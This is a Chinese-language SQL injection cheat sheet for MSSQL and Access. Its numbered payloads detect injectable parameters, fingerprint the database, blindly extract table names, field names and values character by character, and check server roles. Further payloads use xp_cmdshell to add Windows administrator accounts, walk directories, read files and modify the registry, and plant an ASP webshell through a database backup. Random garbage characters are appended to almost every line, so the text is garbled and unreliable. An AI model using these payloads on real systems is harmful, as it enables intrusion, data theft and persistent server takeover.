1.判断是否有注入;and 1=1 ;and 1=2 `p7&�>
BOA
2.初步判断是否是mssql ;and user>0 �A6pj�Rx�g
��W�f&W^Q
3.注入参数是字符'and [查询条件] and ''=' )�h�8\�u_U
QtJg�^�2@
4.搜索时没过滤参数的'and [查询条件] and '%25'=' *s>BG1$<��
9gEssTkts
5.判断数据库系统 �M��yq5b`z
o,�!T2&}��
;and (select count(*) from sysobjects)>0 mssql eU� N"w,@y
acw4��B5]�
;and (select count(*) from msysobjects)>0 access ��3,Q^&
1�
#�zR���b�x
s�qS=q��C�
XxaGp95so�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ~3�5U]s�@v
/2�HN>{F^Y
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �Cc, `}�SP
7z�v1��wb�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �]+m/;�&0
m/@�<�c'�i
9.(1)猜字段的ascii值(access) j�$TwL�;��
]d]JXt?)i
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 j*
*s^�Sg
vUnR�i=�:|
(2)猜字段的ascii值(mssql) !QT'�L,�_�
P�T5AA�8�F
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 f7���'q-��
a+9���*@z2
10.测试权限结构(mssql) AT\qiznv�P
�xGG,2W+z
6�Kj'Zy�VL
*\���o/q�[
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �\^V`ds�*.
!2|=PB' M
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- [M%9_CfZOy
�|�P��.�6<
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �k,�uK6$�Z
�80$f�G8��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- v��i)��%$~
�[�*Z`Kc�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- gn�{=�%`[�
I�
�N��c^L
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- _zu?.I0^��
�~�-83Q5/[
;and 1=(select IS_MEMBER('db_owner'));-- _H�A$�
j2
Jy
�aag-�
�@Fpb�-Qd"
-.|4Y#b:&�
11.添加mssql和系统的帐户 �\�Fe_�rh�
u?[ q=0.J7
;exec master.dbo.sp_addlogin username;-- �3F#+~��^2
;exec master.dbo.sp_password null,username,password;-- C�� �P3<1~
e�r.CDKD%L
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- :v��L1}�H<
1H,g=Y4f%
;exec master.dbo.xp_cmdshell 'net user username password x#N-&ba�S
`:eViV�l6e
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ,JE�bd1Uf�
8V-\e?&�^�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- � A, P�lvI
RuG-{NF{F�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �+]@Az��.E
�cM_����Fp
S',�9g�4(5
K"V���:<�a
12.(1)遍历目录 k5&bq�2�)I
\Yoa:|%*y�
;create table dirs(paths varchar(100), id int) �$^tv�4��5
vwr�74A.g0
;insert dirs exec master.dbo.xp_dirtree 'c:\' CZEW-PI�hj
I�t��X5JV)
;and (select top 1 paths from dirs)>0 (#�oycj^�<
3���},Zlu�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) sK��� 2
e&
9��%�IlW��
#2:a[�
~Lf
jb� /8?7�
(2)遍历目录 /"ymZ�I!k\
F#{gf��h�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- (Bo bB�]~a
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 i%��#$��*�
=_��[��Z W
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 n�tP|�\�E
1|?�K\�B�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 w^1�Fi�8�+
�3q�QUpm+
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 = zl=��SLe
?R5'#|�EyX
)n=ARD�d^e
?�_`0G/�xl
13.mssql中的存储过程 L�jdYsa�i-
�kH�J�96G�
xp_regenumvalues 注册表根键, 子键 �M"_F�rIO�
*w�V�[TKaN
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 )nu~9km�3�
`Vq`z]}��
xp_regread 根键,子键,键值名 LihjGkj\�g
(H?ZSeWx��
;exec xp_regread =raA?Bp3;(
�[^~7]2��i
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 e�u'1H@vX(
���.~}z4r�
xp_regwrite 根键,子键, 值名, 值类型, 值 j|e[s �?�d
QT#6'>&7-b
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 nB5�Am^bP
�w�E)�.> �
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 M�@�p"y�q
��T� ^JuZG
xp_regdeletevalue 根键,子键,值名 FXo2Y]K3`L
�+�dk�S�/b
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ?�G?��gy2�
!6w�{(Rc(C
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �0W>9'Rw�
M��jaUdf�x
�iS@\� =CK
|)W�!�jC&k
14.mssql的backup创建webshell B(l-}|�m�_
�O�e1 �t�\
use model sygH���1|f
TD04/ ISHT
create table cmd(str image); S2~@nhO`U(
THhy�~wC".
insert into cmd(str) values (''); v6e%�#���=
g$j6n{�Y�l
backup database model to disk='c:\l.asp'; ���q��vt�-
-PAF p3w\y
|
W#~F�&{]
�1h"_[`L'�
15.mssql内置函数 ��8o)L,{yl
wAb�p3h�X
;and (select @@version)>0 获得Windows的版本号 .F�0]6#��(
#B\=A�a`*�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �JatHSW7j9
^Y�^"���'"
;and (select user_name())>0 爆当前系统的连接用户 ��c!&Qj��
s0{
NsK�>�
;and (select db_name())>0 得到当前连接的数据库 �FQf�#��*�
Xy#V��Q{�!
S�2�$5!�(P
.#^0p�v�!�
16.简洁的webshell dDKqq(9�(`
L)-*,$#<oW
use model n_$yV:MuT!
Nm�8w/Q5D`
create table cmd(str image); 0^]�t"z5f0
~,}�s(`~��
insert into cmd(str) values (''); LCQkgRs}~{
^i<}]�c_|f
backup database model to disk='g:\wwwtest\l.asp';
